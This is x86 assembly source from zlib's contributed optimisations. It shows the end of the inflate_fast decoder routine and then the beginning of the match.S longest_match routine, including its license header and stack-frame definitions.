xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
.L_get_length_code:
movl lmask(%esp), %edx /* edx = lmask */
movl lcode(%esp), %ecx /* ecx = lcode */
andl hold_r, %edx /* edx &= hold */
movl (%ecx,%edx,4), %eax /* eax = lcode[hold & lmask] */
.L_dolen:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out
*
* dolen:
* bits -= this.bits;
* hold >>= this.bits
*/
movb %ah, %cl /* cl = this.bits */
subb %ah, bits_r /* bits -= this.bits */
shrl %cl, hold_r /* hold >>= this.bits */
/* check if op is a literal
* if (op == 0) {
* PUP(out) = this.val;
* }
*/
testb %al, %al
jnz .L_test_for_length_base /* if (op != 0) 45.7% */
shrl $16, %eax /* output this.val char */
stosb
jmp .L_while_test
.L_test_for_length_base:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out, %edx = len
*
* else if (op & 16) {
* len = this.val
* op &= 15
* if (op) {
* if (op > bits) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* len += hold & mask[op];
* bits -= op;
* hold >>= op;
* }
*/
#define len_r %edx
movl %eax, len_r /* len = this */
shrl $16, len_r /* len = this.val */
movb %al, %cl
testb $16, %al
jz .L_test_for_second_level_length /* if ((op & 16) == 0) 8% */
andb $15, %cl /* op &= 15 */
jz .L_save_len /* if (!op) */
cmpb %cl, bits_r
jae .L_add_bits_to_len /* if (op <= bits) */
movb %cl, %ch /* stash op in ch, freeing cl */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
movb %ch, %cl /* move op back to ecx */
.L_add_bits_to_len:
movl $1, %eax
shll %cl, %eax
decl %eax
subb %cl, bits_r
andl hold_r, %eax /* eax &= hold */
shrl %cl, hold_r
addl %eax, len_r /* len += hold & mask[op] */
.L_save_len:
movl len_r, len(%esp) /* save len */
#undef len_r
.L_decode_distance:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out, %edx = dist
*
* if (bits < 15) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* this = dcode[hold & dmask];
* dodist:
* bits -= this.bits;
* hold >>= this.bits;
* op = this.op;
*/
cmpb $15, bits_r
ja .L_get_distance_code /* if (15 < bits) */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
.L_get_distance_code:
movl dmask(%esp), %edx /* edx = dmask */
movl dcode(%esp), %ecx /* ecx = dcode */
andl hold_r, %edx /* edx &= hold */
movl (%ecx,%edx,4), %eax /* eax = dcode[hold & dmask] */
#define dist_r %edx
.L_dodist:
movl %eax, dist_r /* dist = this */
shrl $16, dist_r /* dist = this.val */
movb %ah, %cl
subb %ah, bits_r /* bits -= this.bits */
shrl %cl, hold_r /* hold >>= this.bits */
/* if (op & 16) {
* dist = this.val
* op &= 15
* if (op > bits) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* dist += hold & mask[op];
* bits -= op;
* hold >>= op;
*/
movb %al, %cl /* cl = this.op */
testb $16, %al /* if ((op & 16) == 0) */
jz .L_test_for_second_level_dist
andb $15, %cl /* op &= 15 */
jz .L_check_dist_one
cmpb %cl, bits_r
jae .L_add_bits_to_dist /* if (op <= bits) 97.6% */
movb %cl, %ch /* stash op in ch, freeing cl */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
movb %ch, %cl /* move op back to ecx */
.L_add_bits_to_dist:
movl $1, %eax
shll %cl, %eax
decl %eax /* (1 << op) - 1 */
subb %cl, bits_r
andl hold_r, %eax /* eax &= hold */
shrl %cl, hold_r
addl %eax, dist_r /* dist += hold & ((1 << op) - 1) */
jmp .L_check_window
.L_check_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes
*
* nbytes = out - beg;
* if (dist <= nbytes) {
* from = out - dist;
* do {
* PUP(out) = PUP(from);
* } while (--len > 0) {
* }
*/
movl in_r, in(%esp) /* save in so from can use it's reg */
movl out_r, %eax
subl beg(%esp), %eax /* nbytes = out - beg */
cmpl dist_r, %eax
jb .L_clip_window /* if (dist > nbytes) 4.2% */
movl len(%esp), %ecx
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
subl $3, %ecx
movb (from_r), %al
movb %al, (out_r)
movb 1(from_r), %al
movb 2(from_r), %dl
addl $3, from_r
movb %al, 1(out_r)
movb %dl, 2(out_r)
addl $3, out_r
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
jmp .L_while_test
.align 16,0x90
.L_check_dist_one:
cmpl $1, dist_r
jne .L_check_window
cmpl out_r, beg(%esp)
je .L_check_window
decl out_r
movl len(%esp), %ecx
movb (out_r), %al
subl $3, %ecx
movb %al, 1(out_r)
movb %al, 2(out_r)
movb %al, 3(out_r)
addl $4, out_r
rep stosb
jmp .L_while_test
.align 16,0x90
.L_test_for_second_level_length:
/* else if ((op & 64) == 0) {
* this = lcode[this.val + (hold & mask[op])];
* }
*/
testb $64, %al
jnz .L_test_for_end_of_block /* if ((op & 64) != 0) */
movl $1, %eax
shll %cl, %eax
decl %eax
andl hold_r, %eax /* eax &= hold */
addl %edx, %eax /* eax += this.val */
movl lcode(%esp), %edx /* edx = lcode */
movl (%edx,%eax,4), %eax /* eax = lcode[val + (hold&mask[op])] */
jmp .L_dolen
.align 16,0x90
.L_test_for_second_level_dist:
/* else if ((op & 64) == 0) {
* this = dcode[this.val + (hold & mask[op])];
* }
*/
testb $64, %al
jnz .L_invalid_distance_code /* if ((op & 64) != 0) */
movl $1, %eax
shll %cl, %eax
decl %eax
andl hold_r, %eax /* eax &= hold */
addl %edx, %eax /* eax += this.val */
movl dcode(%esp), %edx /* edx = dcode */
movl (%edx,%eax,4), %eax /* eax = dcode[val + (hold&mask[op])] */
jmp .L_dodist
.align 16,0x90
.L_clip_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes
*
* else {
* if (dist > wsize) {
* invalid distance
* }
* from = window;
* nbytes = dist - nbytes;
* if (write == 0) {
* from += wsize - nbytes;
*/
#define nbytes_r %ecx
movl %eax, nbytes_r
movl wsize(%esp), %eax /* prepare for dist compare */
negl nbytes_r /* nbytes = -nbytes */
movl window(%esp), from_r /* from = window */
cmpl dist_r, %eax
jb .L_invalid_distance_too_far /* if (dist > wsize) */
addl dist_r, nbytes_r /* nbytes = dist - nbytes */
cmpl $0, write(%esp)
jne .L_wrap_around_window /* if (write != 0) */
subl nbytes_r, %eax
addl %eax, from_r /* from += wsize - nbytes */
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = len
*
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = out - dist;
* }
* }
*/
#define len_r %eax
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
.L_wrap_around_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = write, %eax = len
*
* else if (write < nbytes) {
* from += wsize + write - nbytes;
* nbytes -= write;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = window;
* nbytes = write;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while(--nbytes);
* from = out - dist;
* }
* }
* }
*/
#define write_r %eax
movl write(%esp), write_r
cmpl write_r, nbytes_r
jbe .L_contiguous_in_window /* if (write >= nbytes) */
addl wsize(%esp), from_r
addl write_r, from_r
subl nbytes_r, from_r /* from += wsize + write - nbytes */
subl write_r, nbytes_r /* nbytes -= write */
#undef write_r
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl window(%esp), from_r /* from = window */
movl write(%esp), nbytes_r /* nbytes = write */
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
.L_contiguous_in_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = write, %eax = len
*
* else {
* from += write - nbytes;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = out - dist;
* }
* }
*/
#define write_r %eax
addl write_r, from_r
subl nbytes_r, from_r /* from += write - nbytes */
#undef write_r
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
.L_do_copy1:
/* regs: %esi = from, %esi = in, %ebp = hold, %bl = bits, %edi = out
* %eax = len
*
* while (len > 0) {
* PUP(out) = PUP(from);
* len--;
* }
* }
* } while (in < last && out < end);
*/
#undef nbytes_r
#define in_r %esi
movl len_r, %ecx
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
jmp .L_while_test
#undef len_r
#undef dist_r
#endif /* NO_MMX || RUN_TIME_MMX */
/*** MMX code ***/
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
.align 32,0x90
.L_init_mmx:
emms
#undef bits_r
#undef bitslong_r
#define bitslong_r %ebp
#define hold_mm %mm0
movd %ebp, hold_mm
movl %ebx, bitslong_r
#define used_mm %mm1
#define dmask2_mm %mm2
#define lmask2_mm %mm3
#define lmask_mm %mm4
#define dmask_mm %mm5
#define tmp_mm %mm6
movd lmask(%esp), lmask_mm
movq lmask_mm, lmask2_mm
movd dmask(%esp), dmask_mm
movq dmask_mm, dmask2_mm
pxor used_mm, used_mm
movl lcode(%esp), %ebx /* ebx = lcode */
jmp .L_do_loop_mmx
.align 32,0x90
.L_while_test_mmx:
/* while (in < last && out < end)
*/
cmpl out_r, end(%esp)
jbe .L_break_loop /* if (out >= end) */
cmpl in_r, last(%esp)
jbe .L_break_loop
.L_do_loop_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
cmpl $32, bitslong_r
ja .L_get_length_code_mmx /* if (32 < bits) */
movd bitslong_r, tmp_mm
movd (in_r), %mm7
addl $4, in_r
psllq tmp_mm, %mm7
addl $32, bitslong_r
por %mm7, hold_mm /* hold_mm |= *((uint *)in)++ << bits */
.L_get_length_code_mmx:
pand hold_mm, lmask_mm
movd lmask_mm, %eax
movq lmask2_mm, lmask_mm
movl (%ebx,%eax,4), %eax /* eax = lcode[hold & lmask] */
.L_dolen_mmx:
movzbl %ah, %ecx /* ecx = this.bits */
movd %ecx, used_mm
subl %ecx, bitslong_r /* bits -= this.bits */
testb %al, %al
jnz .L_test_for_length_base_mmx /* if (op != 0) 45.7% */
shrl $16, %eax /* output this.val char */
stosb
jmp .L_while_test_mmx
.L_test_for_length_base_mmx:
#define len_r %edx
movl %eax, len_r /* len = this */
shrl $16, len_r /* len = this.val */
testb $16, %al
jz .L_test_for_second_level_length_mmx /* if ((op & 16) == 0) 8% */
andl $15, %eax /* op &= 15 */
jz .L_decode_distance_mmx /* if (!op) */
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd %eax, used_mm
movd hold_mm, %ecx
subl %eax, bitslong_r
andl .L_mask(,%eax,4), %ecx
addl %ecx, len_r /* len += hold & mask[op] */
.L_decode_distance_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
cmpl $32, bitslong_r
ja .L_get_dist_code_mmx /* if (32 < bits) */
movd bitslong_r, tmp_mm
movd (in_r), %mm7
addl $4, in_r
psllq tmp_mm, %mm7
addl $32, bitslong_r
por %mm7, hold_mm /* hold_mm |= *((uint *)in)++ << bits */
.L_get_dist_code_mmx:
movl dcode(%esp), %ebx /* ebx = dcode */
pand hold_mm, dmask_mm
movd dmask_mm, %eax
movq dmask2_mm, dmask_mm
movl (%ebx,%eax,4), %eax /* eax = dcode[hold & lmask] */
.L_dodist_mmx:
#define dist_r %ebx
movzbl %ah, %ecx /* ecx = this.bits */
movl %eax, dist_r
shrl $16, dist_r /* dist = this.val */
subl %ecx, bitslong_r /* bits -= this.bits */
movd %ecx, used_mm
testb $16, %al /* if ((op & 16) == 0) */
jz .L_test_for_second_level_dist_mmx
andl $15, %eax /* op &= 15 */
jz .L_check_dist_one_mmx
.L_add_bits_to_dist_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd %eax, used_mm /* save bit length of current op */
movd hold_mm, %ecx /* get the next bits on input stream */
subl %eax, bitslong_r /* bits -= op bits */
andl .L_mask(,%eax,4), %ecx /* ecx = hold & mask[op] */
addl %ecx, dist_r /* dist += hold & mask[op] */
.L_check_window_mmx:
movl in_r, in(%esp) /* save in so from can use it's reg */
movl out_r, %eax
subl beg(%esp), %eax /* nbytes = out - beg */
cmpl dist_r, %eax
jb .L_clip_window_mmx /* if (dist > nbytes) 4.2% */
movl len_r, %ecx
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
subl $3, %ecx
movb (from_r), %al
movb %al, (out_r)
movb 1(from_r), %al
movb 2(from_r), %dl
addl $3, from_r
movb %al, 1(out_r)
movb %dl, 2(out_r)
addl $3, out_r
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
.align 16,0x90
.L_check_dist_one_mmx:
cmpl $1, dist_r
jne .L_check_window_mmx
cmpl out_r, beg(%esp)
je .L_check_window_mmx
decl out_r
movl len_r, %ecx
movb (out_r), %al
subl $3, %ecx
movb %al, 1(out_r)
movb %al, 2(out_r)
movb %al, 3(out_r)
addl $4, out_r
rep stosb
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
.align 16,0x90
.L_test_for_second_level_length_mmx:
testb $64, %al
jnz .L_test_for_end_of_block /* if ((op & 64) != 0) */
andl $15, %eax
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ecx
andl .L_mask(,%eax,4), %ecx
addl len_r, %ecx
movl (%ebx,%ecx,4), %eax /* eax = lcode[hold & lmask] */
jmp .L_dolen_mmx
.align 16,0x90
.L_test_for_second_level_dist_mmx:
testb $64, %al
jnz .L_invalid_distance_code /* if ((op & 64) != 0) */
andl $15, %eax
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ecx
andl .L_mask(,%eax,4), %ecx
movl dcode(%esp), %eax /* ecx = dcode */
addl dist_r, %ecx
movl (%eax,%ecx,4), %eax /* eax = lcode[hold & lmask] */
jmp .L_dodist_mmx
.align 16,0x90
.L_clip_window_mmx:
#define nbytes_r %ecx
movl %eax, nbytes_r
movl wsize(%esp), %eax /* prepare for dist compare */
negl nbytes_r /* nbytes = -nbytes */
movl window(%esp), from_r /* from = window */
cmpl dist_r, %eax
jb .L_invalid_distance_too_far /* if (dist > wsize) */
addl dist_r, nbytes_r /* nbytes = dist - nbytes */
cmpl $0, write(%esp)
jne .L_wrap_around_window_mmx /* if (write != 0) */
subl nbytes_r, %eax
addl %eax, from_r /* from += wsize - nbytes */
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
.L_wrap_around_window_mmx:
#define write_r %eax
movl write(%esp), write_r
cmpl write_r, nbytes_r
jbe .L_contiguous_in_window_mmx /* if (write >= nbytes) */
addl wsize(%esp), from_r
addl write_r, from_r
subl nbytes_r, from_r /* from += wsize + write - nbytes */
subl write_r, nbytes_r /* nbytes -= write */
#undef write_r
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl window(%esp), from_r /* from = window */
movl write(%esp), nbytes_r /* nbytes = write */
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
.L_contiguous_in_window_mmx:
#define write_r %eax
addl write_r, from_r
subl nbytes_r, from_r /* from += write - nbytes */
#undef write_r
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
.L_do_copy1_mmx:
#undef nbytes_r
#define in_r %esi
movl len_r, %ecx
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
#undef hold_r
#undef bitslong_r
#endif /* USE_MMX || RUN_TIME_MMX */
/*** USE_MMX, NO_MMX, and RUNTIME_MMX from here on ***/
.L_invalid_distance_code:
/* else {
* strm->msg = "invalid distance code";
* state->mode = BAD;
* }
*/
movl $.L_invalid_distance_code_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_test_for_end_of_block:
/* else if (op & 32) {
* state->mode = TYPE;
* break;
* }
*/
testb $32, %al
jz .L_invalid_literal_length_code /* if ((op & 32) == 0) */
movl $0, %ecx
movl $INFLATE_MODE_TYPE, %edx
jmp .L_update_stream_state
.L_invalid_literal_length_code:
/* else {
* strm->msg = "invalid literal/length code";
* state->mode = BAD;
* }
*/
movl $.L_invalid_literal_length_code_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_invalid_distance_too_far:
/* strm->msg = "invalid distance too far back";
* state->mode = BAD;
*/
movl in(%esp), in_r /* from_r has in's reg, put in back */
movl $.L_invalid_distance_too_far_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_update_stream_state:
/* set strm->msg = %ecx, strm->state->mode = %edx */
movl strm_sp(%esp), %eax
testl %ecx, %ecx /* if (msg != NULL) */
jz .L_skip_msg
movl %ecx, msg_strm(%eax) /* strm->msg = msg */
.L_skip_msg:
movl state_strm(%eax), %eax /* state = strm->state */
movl %edx, mode_state(%eax) /* state->mode = edx (BAD | TYPE) */
jmp .L_break_loop
.align 32,0x90
.L_break_loop:
/*
* Regs:
*
* bits = %ebp when mmx, and in %ebx when non-mmx
* hold = %hold_mm when mmx, and in %ebp when non-mmx
* in = %esi
* out = %edi
*/
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
#if defined( RUN_TIME_MMX )
cmpl $DO_USE_MMX, inflate_fast_use_mmx
jne .L_update_next_in
#endif /* RUN_TIME_MMX */
movl %ebp, %ebx
.L_update_next_in:
#endif
#define strm_r %eax
#define state_r %edx
/* len = bits >> 3;
* in -= len;
* bits -= len << 3;
* hold &= (1U << bits) - 1;
* state->hold = hold;
* state->bits = bits;
* strm->next_in = in;
* strm->next_out = out;
*/
movl strm_sp(%esp), strm_r
movl %ebx, %ecx
movl state_strm(strm_r), state_r
shrl $3, %ecx
subl %ecx, in_r
shll $3, %ecx
subl %ecx, %ebx
movl out_r, next_out_strm(strm_r)
movl %ebx, bits_state(state_r)
movl %ebx, %ecx
leal buf(%esp), %ebx
cmpl %ebx, last(%esp)
jne .L_buf_not_used /* if buf != last */
subl %ebx, in_r /* in -= buf */
movl next_in_strm(strm_r), %ebx
movl %ebx, last(%esp) /* last = strm->next_in */
addl %ebx, in_r /* in += strm->next_in */
movl avail_in_strm(strm_r), %ebx
subl $11, %ebx
addl %ebx, last(%esp) /* last = &strm->next_in[ avail_in - 11 ] */
.L_buf_not_used:
movl in_r, next_in_strm(strm_r)
movl $1, %ebx
shll %cl, %ebx
decl %ebx
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
#if defined( RUN_TIME_MMX )
cmpl $DO_USE_MMX, inflate_fast_use_mmx
jne .L_update_hold
#endif /* RUN_TIME_MMX */
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ebp
emms
.L_update_hold:
#endif /* USE_MMX || RUN_TIME_MMX */
andl %ebx, %ebp
movl %ebp, hold_state(state_r)
#define last_r %ebx
/* strm->avail_in = in < last ? 11 + (last - in) : 11 - (in - last) */
movl last(%esp), last_r
cmpl in_r, last_r
jbe .L_last_is_smaller /* if (in >= last) */
subl in_r, last_r /* last -= in */
addl $11, last_r /* last += 11 */
movl last_r, avail_in_strm(strm_r)
jmp .L_fixup_out
.L_last_is_smaller:
subl last_r, in_r /* in -= last */
negl in_r /* in = -in */
addl $11, in_r /* in += 11 */
movl in_r, avail_in_strm(strm_r)
#undef last_r
#define end_r %ebx
.L_fixup_out:
/* strm->avail_out = out < end ? 257 + (end - out) : 257 - (out - end)*/
movl end(%esp), end_r
cmpl out_r, end_r
jbe .L_end_is_smaller /* if (out >= end) */
subl out_r, end_r /* end -= out */
addl $257, end_r /* end += 257 */
movl end_r, avail_out_strm(strm_r)
jmp .L_done
.L_end_is_smaller:
subl end_r, out_r /* out -= end */
negl out_r /* out = -out */
addl $257, out_r /* out += 257 */
movl out_r, avail_out_strm(strm_r)
#undef end_r
#undef strm_r
#undef state_r
.L_done:
addl $local_var_size, %esp
popf
popl %ebx
popl %ebp
popl %esi
popl %edi
ret
#if defined( GAS_ELF )
/* elf info */
.type inflate_fast,@function
.size inflate_fast,.-inflate_fast
#endif
|
aiekick/Lumo
| 10,365
|
3rdparty/assimp/contrib/zlib/contrib/asm686/match.S
|
/* match.S -- x86 assembly version of the zlib longest_match() function.
* Optimized for the Intel 686 chips (PPro and later).
*
* Copyright (C) 1998, 2007 Brian Raiter <breadbox@muppetlabs.com>
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the author be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#ifndef NO_UNDERLINE
#define match_init _match_init
#define longest_match _longest_match
#endif
#define MAX_MATCH (258)
#define MIN_MATCH (3)
#define MIN_LOOKAHEAD (MAX_MATCH + MIN_MATCH + 1)
#define MAX_MATCH_8 ((MAX_MATCH + 7) & ~7)
/* stack frame offsets */
#define chainlenwmask 0 /* high word: current chain len */
/* low word: s->wmask */
#define window 4 /* local copy of s->window */
#define windowbestlen 8 /* s->window + bestlen */
#define scanstart 16 /* first two bytes of string */
#define scanend 12 /* last two bytes of string */
#define scanalign 20 /* dword-misalignment of string */
#define nicematch 24 /* a good enough match size */
#define bestlen 28 /* size of best match so far */
#define scan 32 /* ptr to string wanting match */
#define LocalVarsSize (36)
/* saved ebx 36 */
/* saved edi 40 */
/* saved esi 44 */
/* saved ebp 48 */
/* return address 52 */
#define deflatestate 56 /* the function arguments */
#define curmatch 60
/* All the +zlib1222add offsets are due to the addition of fields
* in zlib in the deflate_state structure since the asm code was first written
* (if you compile with zlib 1.0.4 or older, use "zlib1222add equ (-4)").
* (if you compile with zlib between 1.0.5 and 1.2.2.1, use "zlib1222add equ 0").
* (if you compile with zlib 1.2.2.2 or later, use "zlib1222add equ 8").
*/
#define zlib1222add (8)
#define dsWSize (36+zlib1222add)
#define dsWMask (44+zlib1222add)
#define dsWindow (48+zlib1222add)
#define dsPrev (56+zlib1222add)
#define dsMatchLen (88+zlib1222add)
#define dsPrevMatch (92+zlib1222add)
#define dsStrStart (100+zlib1222add)
#define dsMatchStart (104+zlib1222add)
#define dsLookahead (108+zlib1222add)
#define dsPrevLen (112+zlib1222add)
#define dsMaxChainLen (116+zlib1222add)
#define dsGoodMatch (132+zlib1222add)
#define dsNiceMatch (136+zlib1222add)
.file "match.S"
.globl match_init, longest_match
.text
/* uInt longest_match(deflate_state *deflatestate, IPos curmatch) */
.cfi_sections .debug_frame
/*-----------------------------------------------------------------------
 * uInt longest_match(deflate_state *deflatestate, IPos curmatch)
 *
 * ABI:   IA-32 cdecl — both arguments on the stack, result in %eax.
 * In:    deflatestate = pointer to the zlib deflate_state
 *        curmatch     = start of the hash chain to walk
 * Out:   %eax = length of best match found, capped at s->lookahead
 * Saves: %ebp, %edi, %esi, %ebx (callee-saved), plus LocalVarsSize
 *        bytes of scratch locals below them.
 *
 * Fix: the epilogue previously had no `ret` and fell through past
 * .cfi_endproc into match_init's `ret`; an explicit `ret` is emitted
 * now so the function is self-contained and the CFI region is correct.
 *----------------------------------------------------------------------*/
longest_match:
.cfi_startproc
/* Save registers that the compiler may be using, and adjust %esp to */
/* make room for our stack frame. */
        pushl   %ebp
        .cfi_def_cfa_offset 8
        .cfi_offset ebp, -8
        pushl   %edi
        .cfi_def_cfa_offset 12
        pushl   %esi
        .cfi_def_cfa_offset 16
        pushl   %ebx
        .cfi_def_cfa_offset 20
        subl    $LocalVarsSize, %esp
        .cfi_def_cfa_offset LocalVarsSize+20
/* Retrieve the function arguments. %ecx will hold cur_match */
/* throughout the entire function. %edx will hold the pointer to the */
/* deflate_state structure during the function's setup (before */
/* entering the main loop). */
        movl    deflatestate(%esp), %edx
        movl    curmatch(%esp), %ecx
/* uInt wmask = s->w_mask; */
/* unsigned chain_length = s->max_chain_length; */
/* if (s->prev_length >= s->good_match) { */
/* chain_length >>= 2; */
/* } */
        movl    dsPrevLen(%edx), %eax
        movl    dsGoodMatch(%edx), %ebx
        cmpl    %ebx, %eax
        movl    dsWMask(%edx), %eax
        movl    dsMaxChainLen(%edx), %ebx
        jl      LastMatchGood
        shrl    $2, %ebx
LastMatchGood:
/* chainlen is decremented once beforehand so that the function can */
/* use the sign flag instead of the zero flag for the exit test. */
/* It is then shifted into the high word, to make room for the wmask */
/* value, which it will always accompany. */
        decl    %ebx
        shll    $16, %ebx
        orl     %eax, %ebx
        movl    %ebx, chainlenwmask(%esp)
/* if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead; */
        movl    dsNiceMatch(%edx), %eax
        movl    dsLookahead(%edx), %ebx
        cmpl    %eax, %ebx
        jl      LookaheadLess
        movl    %eax, %ebx
LookaheadLess:
        movl    %ebx, nicematch(%esp)
/* register Bytef *scan = s->window + s->strstart; */
        movl    dsWindow(%edx), %esi
        movl    %esi, window(%esp)
        movl    dsStrStart(%edx), %ebp
        lea     (%esi,%ebp), %edi
        movl    %edi, scan(%esp)
/* Determine how many bytes the scan ptr is off from being */
/* dword-aligned. */
        movl    %edi, %eax
        negl    %eax
        andl    $3, %eax
        movl    %eax, scanalign(%esp)
/* IPos limit = s->strstart > (IPos)MAX_DIST(s) ? */
/* s->strstart - (IPos)MAX_DIST(s) : NIL; */
        movl    dsWSize(%edx), %eax
        subl    $MIN_LOOKAHEAD, %eax
        subl    %eax, %ebp
        jg      LimitPositive
        xorl    %ebp, %ebp
LimitPositive:
/* int best_len = s->prev_length; */
        movl    dsPrevLen(%edx), %eax
        movl    %eax, bestlen(%esp)
/* Store the sum of s->window + best_len in %esi locally, and in */
/* windowbestlen(%esp) for reloads after the compare loop. */
        addl    %eax, %esi
        movl    %esi, windowbestlen(%esp)
/* register ush scan_start = *(ushf*)scan; */
/* register ush scan_end = *(ushf*)(scan+best_len-1); */
/* Posf *prev = s->prev; */
        movzwl  (%edi), %ebx
        movl    %ebx, scanstart(%esp)
        movzwl  -1(%edi,%eax), %ebx
        movl    %ebx, scanend(%esp)
        movl    dsPrev(%edx), %edi
/* Jump into the main loop. */
        movl    chainlenwmask(%esp), %edx
        jmp     LoopEntry
.balign 16
/* do {
 * match = s->window + cur_match;
 * if (*(ushf*)(match+best_len-1) != scan_end ||
 * *(ushf*)match != scan_start) continue;
 * [...]
 * } while ((cur_match = prev[cur_match & wmask]) > limit
 * && --chain_length != 0);
 *
 * Here is the inner loop of the function. The function will spend the
 * majority of its time in this loop, and majority of that time will
 * be spent in the first ten instructions.
 *
 * Within this loop:
 * %ebx = scanend
 * %ecx = curmatch
 * %edx = chainlenwmask - i.e., ((chainlen << 16) | wmask)
 * %esi = windowbestlen - i.e., (window + bestlen)
 * %edi = prev
 * %ebp = limit
 */
LookupLoop:
        andl    %edx, %ecx              /* cur_match &= wmask */
        movzwl  (%edi,%ecx,2), %ecx     /* cur_match = prev[cur_match] */
